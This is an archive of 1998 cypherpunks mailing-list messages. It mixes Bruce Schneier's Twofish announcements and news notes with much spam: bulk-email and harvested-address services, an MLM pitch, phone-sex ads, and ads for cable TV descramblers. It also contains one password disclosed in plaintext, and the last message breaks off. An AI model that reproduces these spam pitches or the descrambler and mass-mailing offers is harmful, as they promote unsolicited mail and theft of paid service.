FOREIGN ORDERS -Add $15us if you desire Air Parcel Post Shipment.  We ship all over the world.

By deleting your unwanted E-Mail you waste one keystroke, yet
by throwing away paper mail you waste our planet!  SAVE THE
TREES and support internet E-Mail instead of paper mail!

[C] Copyright TCPS 1998





















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 14 Jun 1998 06:01:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Twofish (our AES Submission) is Available
Message-ID: <199806141301.IAA20051@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


Twofish, the block cipher we have submitted to NIST's AES competition, is on the web.  Please see

	http://www.counterpane.com/twofish.html

for details, including description, analysis, source code, and test vectors.

Other AES submissions will presumably be made public as the weeks progress, although NIST will not publish the submissions until the August meeting.  See the NIST website at

	http://csrc.nist.gov/encryption/aes/aes_home.htm

for more details.

Bruce




**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: replies444@juno.com
Date: Sun, 14 Jun 1998 11:05:30 -0700 (PDT)
Subject: A Unique Email Advertisement
Message-ID: <199806141805.LAA09023@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


HELLO
The following information is not meant to spam or upset anyone, that is why we include 
Advertisement in the subject line to give you an option to delete before you open the 
message. We are a Reliable Internet Company that does full Internet Marketing.  
Whatever your needs to market your business or product, A.I.M. can help you 
achieve your success. Please do not treat this as just another piece of junk mail, we 
are Aimed to your success.

A.I.M. was established in 1994 and has helped many people on the Internet market 
their business and products successfully.  We do not sell random bulk email lists, nor 
do we advertise Adult Sites or Chain Letters.

Right now the largest form of communication is done through the Internet, and 1998 
will be  another record breaking year.  There are over 60 million people that have 
Internet access world wide, and that number continues to rise at a rate of over 40,000 
per month.  The best way to market any product or service is through the Internet, and 
random bulk mail is not the way to go.  You may ask, why am I sending you this ONE 
piece of email; to get my information out so that others can follow the same practices 
of Internet advertising.  The Internet community would benefit from direct advertising!

Now you ask what can we offer you.....

CUSTOM TARGETED EMAIL ADDRESSES
No matter what your target is, we can compile a great list for you of people or 
businesses that are interested in what you offer. Say, for instance, you would like to 
send a newsletter out to people interested in MLM; we can compile a list for you of 
people currently involved in MLM.  If you would like a list of people looking for a 
business opportunity, we can compile that list for you. You tell us your target; we will 
compile that list.  We can even target your list geographically.
example...If your business is selling CD's, and your company is based in NY; we can 
gather a list of people in NY interested in CD's.  We have a client that is involved in 
MLM, who asked us to target 1000 opportunity seekers to start.  To his surprise he 
got 7 new people in his downline from just that one mailing.  Another client wanted to 
send a letter out to birdwatchers.  We targeted 5000 birdwatchers for him; and he, 
also, became a very happy client of ours. We have targeted.. investors, businesses, 
International addresses,women, men, age groups, cites, states, doctors, lawyers, etc....

Some of our clients are getting results of 1-40%.  Targeted mailings start at $50 per 
thousand, and we can offer you a better price at higher quantities.

Complete Pricing for Targeted Email

1000 targeted email addresses $50 for us to email $50=$100
2000 targeted email addresses $85 for us to email $85=$170
5000 targeted email addresses $250 (no charge for us to email)
10000 targeted email addresses and we mail $500
100000 targeted email addresses and we mail $1,000
1 million  guaranteed targeted email addresses and we mail $5,000
We offer a guarantee that our lists will be targeted to your topic.  We keep a master 
file on all of our clients so if you order again you will never get any duplicate addresses 
from us

EMAILING
We can do the email for you and have all of the replies come directly to your email 
address.  If you prefer to do the mailing yourself, we sell email software as well.
Here is a few:
Rapid Fire Mail Server....Turns Your Computer into a mail server $495.00 (free 
demo)
Stealth Mass Mailer...Sends out email at a rate of 100,000+ per hour $395.00(free 
demo)
Mail Pusher....The newest in Bulk Email Software (great program) $300.00 (free 
demo)


OTHER SERVICES OFFERED BY A.I.M.

WEBSITE MARKETING PACKAGE

We can place your website to the top of any given search engine. Our best results 
come from Infoseek.
Guarantee top 10 listing.
$300.00  first month  $300.00 every month there after

COMPLETE WEB MARKETING PACKAGE

(1) Targeted Emails in the amount of 200,000 per week
(2) Posting your website to BBS (Internet Bulletin Board Systems Related to your 
topics)
(3)  URL links to other sites related to your topics
(3) Newsgroup Postings (1000) per month
(4)  Banner Ads to related subject searches
(5) Website Submissions to the search engines with a guaranteed 1st page placement 
to Infoseek and submissions to the other top 8 as well as 400 other search engines

All of the postings, submissions, banner ad and URL advertising will be done with your 
reply email address so that you have a copy of every placement and you know where 
your ads are on the Internet.


Total price for complete marketing package $2500.00 per month

IF YOU have a business, product, or just want to get your information out; you have 
no need to look any further.  A.I.M.  is here to help!!  

Now as you can see we are a full service company, and we can help you with any of 
your  advertising needs.

Please call us toll free at 1-800-942-7913 today!

We look forward to hearing from you and are happy to answer any questions that you 
may have.  Once again, we give you our guarantee that this is the only piece of email 
that you receive from us. We wish you success now and in the future!

Again our toll free number is 800-942-7913
our fax # 732-367-2229

We accept...Visa/MasterCard/American Express or check by fax

Thank you









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 14 Jun 1998 08:09:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Childlove and Feds
Message-ID: <1.5.4.32.19980614150621.006a81f4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT today has a long piece on phone hackers,
"The Good. The Bad. The Geeks." With focus on a 
a few in New York City: Mantis, Wicked, Bell Boy,
Vertigo, et al.

Mantis admits working with LEAs in catching pedophiles
and phreakers (note link) who do not abide the "Hacker 
Ethic" of doing no harm, only "helping society" by exposing 
security weaknesses. 

Not all Feds and phreakers agree that pedophobic Feds 
and teeny-cute phreaks help society, although the pedophilic 
Agency allegedly abusing the adorable phreaker for its 
come-on entrapment had "no comment" to its online 
childlove racketeering and profiteering, sort of like the
NYT's art spiegel comic today.

   http://www.nytimes.com

Our clone:

   http://jya.com/gbg.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PAWS@12930.com
Date: Sun, 14 Jun 1998 11:44:13 -0700 (PDT)
To: 061298@irst-max.com
Subject: PAWS Across the NET for Success
Message-ID: <061298>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
We have your name on our safe email list.  If this reaches you in error
please send removal requests to rm0021@irst-max.net.  Your name will
immediately be removed from our list with our sincere apology for the 
intrusion.

 * * * P.A.W.S. * * * People Across the World Succeeding * * *
 
 FREE TO JOIN!!  We Help You Build Your Matrix!!!!!
 
 How about a group of people joining together to recruit and 
 market.  A group determined to make money. A group where no 
 one is at the advantage. And no one is at a disadvantage. 
 Everyone pays the same and earns the same. This is one of
 the most compelling business opportunities you will find on
 the internet today.

 97% of all MLM'ers fail to reach their financial goal. They
 never earn the kind of money they intended to when they got
 into their business. More often they lose money because the
 average person only sponsors 2.5 people. They end up spending
 more than they make and the only ones who make money are 
 those who join at the top.

 We feel we have found a way to change that.  People helping
 people is our philosophy.  We heard and we created the PAWS
 Association!! If you are a caring, individual and have a 
 desire to help others by also helping yourself, please email
 us with "more info" in the subject line and your email address 
 in the body.  Send it to:  paws-4-u-info@autoresponder.freeyellow.com

You will receive an immediate reply.


</FONT><FONT  COLOR="#000000" SIZE=3>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <cabletv@208.4.7.8>
Date: Sun, 14 Jun 1998 15:04:11 -0700 (PDT)
Subject: CABLE BOX DESCRAMBLERS
Message-ID: <989.283923.817969 cabletv@208.4.7.8>
MIME-Version: 1.0
Content-Type: text/plain


To be removed from our mailing list please reply with "REMOVE" in the subject 
line.

Cable T.V. Descramblers, Converters, And Accessories for sale. We carry cable 
descramblers for all major name brand cable boxes used by cable companies.  All 
units are compeletly automatic and digital, and there are no complicated 
programing involved, Just hookup and enjoy the latest technology in cable tv 
equipments.

We carry high quality units at low prices, prices start as low as $129 and up.  
All of our products are backed by:

30 DAYS MONEY BACK GARAUNTEE.
ONE YEAR WARRANTY.
FULL TECHNICAL SUPPORT.

For more information, pictures and prices or to order visit our
web site at http://208.4.7.8/intersales.cc/cabletv or 
http://users.replinets-max.com/rm0232

P.S. Respond and purchase your cable TV descrambler within 10 days of reciept of 
this email and get a free gift with your perchase.($40 value).  
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 14 Jun 1998 16:06:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Twofish soruce code outside the U.S.
Message-ID: <199806142306.SAA00045@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


It's time to play the dumb export control game.

I have to take steps to prevent non-US and non-Canadian persons from downloading the Twofish source.

However, if someone outside the US manages to get their hands on the Twofish source from my website and puts it up on their website, please let me know.

I would like very much to link to it, so others can get the Twofish code.

Thanks,
Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 14 Jun 1998 17:00:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Converting my Twofish PostScript file to pdf
Message-ID: <199806150000.TAA06546@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


We have been unable to do this.  We've tried, a few times, and failed miserably.

If anyone has the correct tools to do a clean conversation from Postscript into pdf, please do so and send me the pdf file.  I will post it.

Thanks,
Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: realtor@electronicpromotion.com
Date: Sun, 14 Jun 1998 19:32:36 -0700 (PDT)
To: realtor@electronicpromotion.com
Subject: REALTOR.com Specials!!
Message-ID: <199806150232.TAA16422@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


RealSelect Offers Tremendous Savings
On The Official NAR Web Site - http://www.REALTOR.com

IT'S ALL ABOUT LEADS...

Does the thought of unlimited classified advertising to over 3 million consumers interest you?  Would you like to market yourself and all of your listings on the world's largest website, REALTOR.com?  RealSelect is offering you a home page and upgrade 
special that can't be beat!  Save $100 off the regular retail price!  You can't afford to miss this special! The normal retail value is $374 for all of our SIMPLE Tools and setup, but
for only $274, you can have a years worth of the newest technology in
generating qualified leads for only $5 per week!    *Available only to
first year subscribers - offer valid through 6/30/98

REMEMBER, THIS PROGRAM IS ALL ABOUT GENERATING LEADS FOR YOU!
Click here to ORDER NOW!  http://www.realtor.com/marketing/home.htm
(To receive this special pricing YOU MUST ENTER BILLING CODE SP5098.)
 OR-
Using your Internet browser,
1.	Type http:// www.REALTOR.com in the address window;
2.	Once at the REALTOR.com home page, click on the blue "Internet Marketing" button located on the left hand side of the REALTOR.com web page;
3.	Select "Create Agent Simple" or "Create Office Simple";
4.	Then follow the easy steps to make big $$$ with REALTOR.com!
(To receive this special pricing YOU MUST ENTER BILLING CODE SP5098.)
 OR-
If you have any questions or need help in getting started then respond to this e-mail or fax us at (619) 291-3553.  We will personally contact you to assist.
 Don't miss this fantastic offer!! Promotion ends June 30, 1998! --

To Remove your email address from future announcements regarding REALTOR.COM specials, reply with "remove" as the subject line and you will immediately be taken off the list.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hjfdujf@juno.com
Date: Sun, 14 Jun 1998 20:17:41 -0700 (PDT)
To: Friend@public.com
Subject: A Unique Email Advertisement
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


HELLO
The following information is not meant to spam or upset anyone, that is why we include
Advertisement in the subject line to give you an option to delete before you open the
message. We are a Reliable Internet Company that does full Internet Marketing. 
Whatever your needs to market your business or product, A.I.M. can help you achieve
your success. Please do not treat this as just another piece of junk mail, we are Aimed to
your success.

A.I.M. was established in 1994 and has helped many people on the
Internet market their business and products successfully.  We do not sell random bulk
email lists, nor do we advertise Adult Sites or Chain Letters.

Right now the largest form of communication is done through the Internet, and 1998 will
be  another record breaking year.  There are over 60 million people that have Internet
access world wide, and that number continues to rise at a rate of over 40,000 per month. 
The best way to market any product or service is through the Internet, and random bulk
mail is not the way to go.  You may ask, why am I sending you this ONE piece of email;
to get my information out so that others can follow the same practices of Internet
advertising.  The Internet community would benefit from direct advertising!

Now you ask what can we offer you.....

CUSTOM TARGETED EMAIL ADDRESSES
No matter what your target is, we can compile a great list for you of people or businesses
that are interested in what you offer. Say, for instance, you would like to send a newsletter
out to people interested in MLM; we can compile a list for you of people currently
involved in MLM.  If you would like a list of people looking for a business opportunity,
we can compile that list for you. You tell us your target; we will compile that list.  We can
even target your list geographically.
example...If your business is selling CD's, and your company is based in NY; we can
gather a list of people in NY interested in CD's.  We have a client that is involved in
MLM, who asked us to target 1000 opportunity seekers to start.  To his surprise he got 7
new people in his downline from just that one mailing.  Another client wanted to send a
letter out to birdwatchers.  We targeted 5000 birdwatchers for him; and he, also, became a
very happy client of ours. We have targeted.. investors, businesses, International
addresses,women, men, age groups, cites, states, doctors, lawyers, etc....

Some of our clients are getting results of 1-40%.  Targeted mailings start at $50 per
thousand, and we can offer you a better price at higher quantities.

Complete Pricing for Targeted Email

1000 targeted email addresses $50 for us to email $50=$100
2000 targeted email addresses $85 for us to email $85=$170
5000 targeted email addresses $250 (no charge for us to email)
10000 targeted email addresses and we mail $500
100000 targeted email addresses and we mail $1,000
1 million  guaranteed targeted email addresses and we mail $5,000
We offer a guarantee that our lists will be targeted to your topic.  We keep a master file on
all of our clients so if you order again you will never get any duplicate addresses from us

EMAILING
We can do the email for you and have all of the replies come directly to your email
address.  If you prefer to do the mailing yourself, we sell email software as well.
Here is a few:
Rapid Fire Mail Server....Turns Your Computer into a mail server $495.00 (free demo)
Stealth Mass Mailer...Sends out email at a rate of 100,000+ per hour $395.00(free demo)
Mail Pusher....The newest in Bulk Email Software (great program) $300.00 (free demo)


OTHER SERVICES OFFERED BY A.I.M.

WEBSITE MARKETING PACKAGE

We can place your website to the top of any given search engine. Our best results come
from Infoseek.
Guarantee top 10 listing.
$300.00  first month  $300.00 every month there after

COMPLETE WEB MARKETING PACKAGE

(1) Targeted Emails in the amount of 200,000 per week
(2) Posting your website to BBS (Internet Bulletin Board Systems Related to your topics)
(3)  URL links to other sites related to your topics
(3) Newsgroup Postings (1000) per month
(4)  Banner Ads to related subject searches
(5) Website Submissions to the search engines with a guaranteed 1st page placement to
Infoseek and submissions to the other top 8 as well as 400 other search engines

All of the postings, submissions, banner ad and URL advertising will be done with your
reply email address so that you have a copy of every placement and you know where your
ads are on the Internet.


Total price for complete marketing package $2500.00 per month

IF YOU have a business, product, or just want to get your information out; you have no
need to look any further.  A.I.M.  is here to help!!  

Now as you can see we are a full service company, and we can help you with any of your 
advertising needs.

Please call us toll free at 1-800-942-7913 today!


We look forward to hearing from you and are happy to answer any questions that you may
have.  Once again, we give you our guarantee that this is the only piece of email that you
receive from us. We wish you success now and in the future!

Again our toll free number is 800-942-7913
our fax # 732-367-2229

We accept...Visa/MasterCard/American Express or check by fax

Thank you









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <replynow@mail.com>
Date: Sun, 14 Jun 1998 23:37:17 -0700 (PDT)
Subject: The One Stop - Music Shop
Message-ID: <989.283923.714193 replynow@mail.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Webmaster,

We would like to offer your company an opportunity to host an 
ALAMO "MIRROR" site in exchange for a 10% commission on all 
musical instrument sales generated by your company. Alamo 
supplies all brands and models directly to the local markets 
worldwide, for LESS cost than any buyer can purchase the same 
product(s) locally. 


We propose the following:

1) URGENT REPLY REQUESTED!!! If you are interested be our 
exclusive agent in your area, then E-mail us ASAP so we will 
let other respondents know that your territory has been 
alocated to your company. Totally there will be over 200 
countries and territories represented, including all 50 
American states.

mailto:reply-now@highpro.com?Subject=ALAMO_MIRROR_SITES

NOTE! Agents will be accepted on a first come-first serve basis.

2) Please reply ASAP to us with the following information

   a) Homepage URL
   b) E-mail Address
   c) URL of your ALAMO MIRROR SITE
   d) E-mail address of your ALAMO REPRESENTATIVE/WEBMASTER

mailto:reply-now@highpro.com?Subject=ALAMO_MIRROR_SITES

3) We will E-mail our website to you in ZIPPED FORMAT (1MB). 

4) Please alter all contact E-mail addresses and company 
information to yours so that visitors to your site will 
contact you DIRECTLY. If relevant, please translate our 
site in to your local language.

5) Load all files onto your local server and E-mail us 
when it's up! We will notify ALL other mirrors sites of 
your addition!

MUSICAL INSTRUMENT ORDER PROCESS 

All incoming enquiries should be forwarded to us for processing. 
Copies of our replies will be sent to you. Buyers will be 
invoiced by us directly, copied to you. Once we receive their 
payment, we will credit your account. Commission will be paid to 
all agents monthly.

PLEASE NOTE! IMPORTANT!!!

Once we establish the Cybermall NEXT MONTH, EVERYTHING will 
be automated so you will NOT need to DO ANYTHING in-line to 
generate order. Therefore, you just need to develop the market 
locally OFF LINE (FAX, PHONE, MAIL).

MUTUAL BENEFITS 

1) We are the ONLY Musical Instrument Cybershop that delivers 
EVERYTHING in the Industry. Custom orders! OEM! ALL famous 
brands and types of instruments, etc. We have THE LARGEST 
SELECTION at the MOST COMPETITIVE PRICES. Why? We sell 
factory direct WORLDWIDE, and all our marketing is on-line, 
therefore we have virtually NO OVERHEAD. Saving time, money, 
and resources! Consumers save 10-60% on purchases through us.

2) The average instrument costs US$2,000, so commissions 
will normally average US$200 per instrument, so returns on 
your investment should be generated very quickly.

3) Alamo is fully established in the music industry 
worldwide as the leader in DIRECT MARKETING MUSICAL 
INSTRUMENTS WORLDWIDE. So, your MIRROR site will 
instantaneously linked to our global network of millions 
of prospect buyers. We will provide you with all the 
necessary marketing needed to effect various local marketing 
drives. WE DO THE REST!  Ie. Daily processing, on-line 
marketing, and transactions. Our elite promotions will 
generate sufficient traffic through your site.

4) We will provide you with various marketing materials, 
data, and databases for you to utilize to promote your site 
on and off line. We will register your site in up to 1,000 
Search Engines, and in multiple keyword categories, and in 
high priority.

5) Once all of the 300+ worldwide agents have been implemented,
we will open a ON-LINE CYBERMALL whereby buyers wil be able to 
go to ANY MIRROR SITE and make purchases via Credit Cards and 
all information and processing will be automated.

BACKGROUND INFORMATION

Our Homepage is one of the most visited music sites on the 
web. The Alamo Group has developed various Internet Marketing 
softwares that are perhaps the most powerful lead generating 
tools on the Net. We have built up a database of over 3.5 
million prospective clients that are interested in purchasing 
musical instruments. 

We look forward to assisting you to become prosperous agents. 
Thank you very much for your attention to the above matters!

Kindest regards,

Gerald A. Alleva
President

************************************************************
*    _ _      _            _ _      _ _    _ _    _ _ _    *
*   /   \    | |          /   \    |   \  /   |  /  __  \  *
*  / /_\ \   | |         / /_\ \   | |\ \/ /| | /  /  \  \ *
* / _ _ _ \  | |_ _ _   / _ _ _ \  | | \__/ | | \  \__/  / *
*/_/     \_\ |_ _ _ _| /_/     \_\ |_|      |_|  \_ _ _ /  *
*                                                          *
*               "THE ONE-STOP MUSIC SHOP"                  *
************************************************************
*                                   ,-all brands/models    *
*             _ _ _                /|-lowest prices        *
* |\___ALAMO__|_|_|_(__TRADE LTD._/ |-large inventory      *
* |/----//---[!|!|!]-----\\-------\ |-fast service         *
*       [| (G|E|R|A|L|D) |]        \|-all credit cards     *
*       \\=(A|L|L|E|V|A)=//         '-high traffic site    *
*        \\__|*|*|*|____// -100% satisfation guaranteed    *
*            [_]_[_]                                       *
*                                                          *
*  mailto:reply-now@highpro.com?Subject=ALAMO_MIRROR_SITES *
*          Telephone/Fax: (852) 2987-9273                  *
*             BOOKMARK our HOMEPAGE NOW                    *
*               http://www.alamohk.com                     *
************************************************************
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@digfrontiers.com
Date: Sun, 14 Jun 1998 23:52:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Digital Frontiers Newsletter #2 - Correction
Message-ID: <199806150652.BAA10668@nero.interaccess.com>
MIME-Version: 1.0
Content-Type: text/plain


Digital Frontiers Newsletter #2
-------------------------------
Thank you for your interest in Digital Frontiers web optimization
products. This email is to inform you of some recent changes to our
product lineup. If you don't want to receive future mailings, our
apologies -- please reply to info@digfrontiers.com. 

We apologize if you have received more than one copy of this newsletter - we're trying to improve our list management software, but are still working out the kinks.

*** 10% Off on all HVS Products! ***
------------------------------------
In a blatant ploy to get you off the golf course/beach and back in front of your computer optimizing your web graphics (just kidding), we're offering a 10% discount across our entire product line until July 15. There's never been a better time to purchase the award-winning HVS series.

*** HVS Animator Version 1.03 ***
---------------------------------
Version 1.03 of HVS Animator has just been released for Macintosh. This new version includes the ability to set exact loop counts. We expect the Windows version to be available within a few days. For your free download please visit our website at http://www.digfrontiers.com.

*** NEW! HVS ColorGIF 2.0/HVS Animator Pro Bundle ***
-----------------------------------------------------
HVS Animator Pro, the GIF animation editor/optimizer that contains the same size-squeezing technology as HVS GIFCruncher, can now be purchased with HVS ColorGIF 2.0 for only $145. Also, The HVS Toolkit Pro, which includes HVS ColorGIF 2.0, HVS JPEG, and HVS Animator Pro, is available for only $208.

If you already own HVS ColorGIF 2.0, if you register you can upgrade to HVS Animator Pro for $49. Both can be purchased via our secure commerce server at:

 http://www.digfrontiers.com/purchase.html 

*** Reviews ***
---------------
In the June issue of PC Graphics & Video, HVS optimization stacks up quite favorably against higher-profile (and more expensive) offerings from Adobe, Macromedia, and others. Take a look. By the way - they misprinted the price at $599 for our Toolkit Pro - its actually $208!

Andy King, a leading industry analyst and Managing Editor of Mecklermedia's webreference.com, looks at HVS ColorGIF 2.0 in a detailed article on color reduction. Go to http://www.webreference.com/dev/graphics/reduce.html.

*** HVS GIFCruncher Update ***
------------------------------
The response to HVS GIFCruncher, our free GIF optimization service, has been overwhelming. The reports we're getting indicate that GIFCruncher users are thrilled with the results. We have had enough load that the current server is getting bogged down at times. So we're moving HVS GIFCruncher to a fast new server - we expect to be online by late June. If you haven't tried GIFCruncher yet, give it a spin - it can reduce the size of your GIFs by 50% or more - http://www.digfrontiers.com/gcrunch.html. Currently, all enabled HVS GIFCruncher features are free so everyone can get acquainted with the service and the excellent results it can produce. We will be transitioning to a fee basis for Custom and Batch operations in a few weeks, but basic operations will remain free. 

On a related note, we've had many requests for a desktop version of HVS GIFCruncher. We're working on it now, and expect it to be ready in a few weeks - if you would like to be included on an early release list, please let us know at info@digfrontiers.com. 

The HVS GIFCruncher Webmaster Version is available now, and can automatically process an entire local, FTP or HTTP directory -- or an entire site -- and optimize all the GIFs that it finds using award-winning HVS optimization algorithms. Details are at http://www.digfrontiers.com/gc_wv_faq.html.

Thanks for your time and keep conserving bandwidth with HVS products! 

-----------------
Digital Frontiers
1019 Asbury Ave.
Evanston, IL 60202
847-328-0880 voice
847-869-2053 fax
info@digfrontiers.com
http://www.digfrontiers.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 15 Jun 1998 02:59:49 -0700 (PDT)
To: Cypherpunks@toad.com (coolness)
Subject: The I.R.S.
Message-ID: <4b63593f.3584f05d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, I've tied a bunch of stuff together on the big conspiracy I've
discovered, think you'll find the additions interesting.  If you want to know
why popular music sucks, my page basicly shows you why.

Thanks for listening,

Stan
======
'The MOST Important Music Page on the Net!'
http://members.aol.com/whtsametu/camel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sun, 14 Jun 1998 14:53:52 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson deceived - Toyota need to know
Message-ID: <1.5.4.32.19980614214444.00718f6c@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

It is with great sadness that I have to alert you, yet again, to the
unethical behaviour of Channel 9's 60 MINUTES programme. This follows the
programme "A CALL TO ARMS" on 7th June in which they tried, without
foundation, to link One Nation to "US extremist militia" just days before
the state election.

See: http://www.gwb.com.au/60.html

Last night a segment on 60 MINUTES featured One Nation and an extensive
interview between Paul Lyneham and Pauline Hanson. 

Her appearance made a liar of her as she is on the record as saying that she
would not again be interviewed by 60 MINUTES.

Pauline Hanson told me this morning, 

QUOTE:

"There was no mention about my interview with Paul Lyneham being for 60
Minutes. The programme approached me a couple of weeks ago and I turned them
down. I feel deceived by 60 Minutes."

"I was shocked when I saw my interview with Lyneham appearing on Sixty
Minutes last night. 60 Minutes know that I do not want to appear on their
programme." 

END QUOTE.

This behaviour cannot be helpful to the excellent reputation of their major
sponsor Toyota.

You may contact them at

toyota@spike.com.au

Please take a moment to tell them how you feel about these issues.

GWB




Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 15 Jun 1998 06:15:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I have the Twofish paper in pdf; thanks
Message-ID: <199806151315.IAA08574@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


You can stop sending me new versions.

Thanks,
Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
                                            http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 15 Jun 1998 05:33:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Prepare Y2K
Message-ID: <199806151233.IAA10510@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT Magazine, June 14, 1998:

PREPARE YE 

This will make for a gloomy five days, but from June 29 to 
July 3 disaster experts from all over will convene in 
Russellville, Ark., to talk about "Principles and Practice 
of Disaster Relief and Recovery." 

Sessions cover: How to create an emergency mass mortuary, 
toxic-waste cleanups and dealing with nuclear meltdown. 

Vernie R. Fountain, of the Fountain National Academy of 
Professional Embalming Skills in Springfield, Mo., will 
discuss "identification of the dead" after natural and 
man-made disasters. 

Natural disasters have killed 181 people this year in the 
United States; there have been more than 600 tornadoes. 

Are we in jinxed times? "It's been a pretty good year so 
far, not a lot of terrorism," says Matthew Blais, a 
nuclear-terrorism expert. "But there are a lot of crazy 
people out there, saving up for the big one. You never 
know when." 

---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reply664@yahoo.com
Date: Mon, 15 Jun 1998 07:19:38 -0700 (PDT)
Subject: Re: FREE PHONESEX (664)410-4332
Message-ID: <199806151420.KAA15493@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir/Madam:

Due to our 1 year aniversary,  we are giving you a FREE treat!
For the next month you can call the number below and have FREE PHONESEX!
The first two hours of any of your calls in the next month will be

***** ABSOLUTELY FREE!!  NO QUESTIONS ASKED! *****

so pick up the phone and call (664)410-4332 NOW!

our girls are hot, young, blond, horny and want to play with you NOW!

CALL  (664)410-4332 NOW!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mscompia@microsoft.com
Date: Mon, 15 Jun 1998 11:18:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Information From The Microsoft Personal Information Center
Message-ID: <023bf4617180f68UPIMSSMTPSYS08@msn.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your password you requested from the Microsoft Personal Information Center at http://register.microsoft.com/regwiz/personalinfo.asp.

Password: writecode

If you continue to have access problems or want to report other issues, please contact us through the Write Us button at the top of any Microsoft page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 15 Jun 1998 15:31:43 -0700 (PDT)
To: cypherpunks@toad.com (coolness)
Subject: Response to Anon.
Message-ID: <a98ecf14.3585a09c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Nobody writes - << Hi Stan - 
I think your link you referenced above is incorrect (but I found it anyway).  
You might want to try using 
http://members.aol.com/whtsametau/camel instead.

Thanks for posting the link, but you have raised some questions.  During an 
interview with Gilmour/Waters, they said that the album "The Wall" was about a
"wall of reality" between the band and Pink Floyd's fans (these are their 
words EXACTLY). >>

Obviously, because of your next obvservation, I find this to be incredible.


<< I find it interesting that you also emulate a "Wall Of 
Reality" and use Pink Floyd's music to back it up.  You seem to be giving 
mixed signals - in Pink Floyd's case, a "Wall Of Reality" would be a BAD 
thing.  I wasn't sure what message you were trying to get out. >>

Also - <<  Also, wasn't the whole point of Pink Floyd's The Wall to 
"tear down the wall"?  You are sending some conflicting 
messages.  You might want to re-think your strategy. >>


My big mistake there, was to allow supposed Floyd sites on.  I've been
thinking about that very thing and will be making changes to that ring (or
I'll be destroying it).  I appreciate your constructive criticism, thanks!
Remember, I created that wall before I knew about the I. R. S..  I also have
many changes that need to be done to What's A Meta U (and What's It 2 U?),
they'll have to wait a little longer as well, I now have a more important
page.

Stan 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: afriend@plato.qi3.com
Date: Tue, 16 Jun 1998 03:01:31 -0700 (PDT)
To: jijipep7@aol.com
Subject: hello
Message-ID: <219806133963VAA14895@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
SAY GOOD-BYE TO AOL TIMERS AND ELIMINATE YOUR FRUSTRATION FOREVER!! 
  Are you tired of the "AOL Timers" interrupting your time on the internet? Are
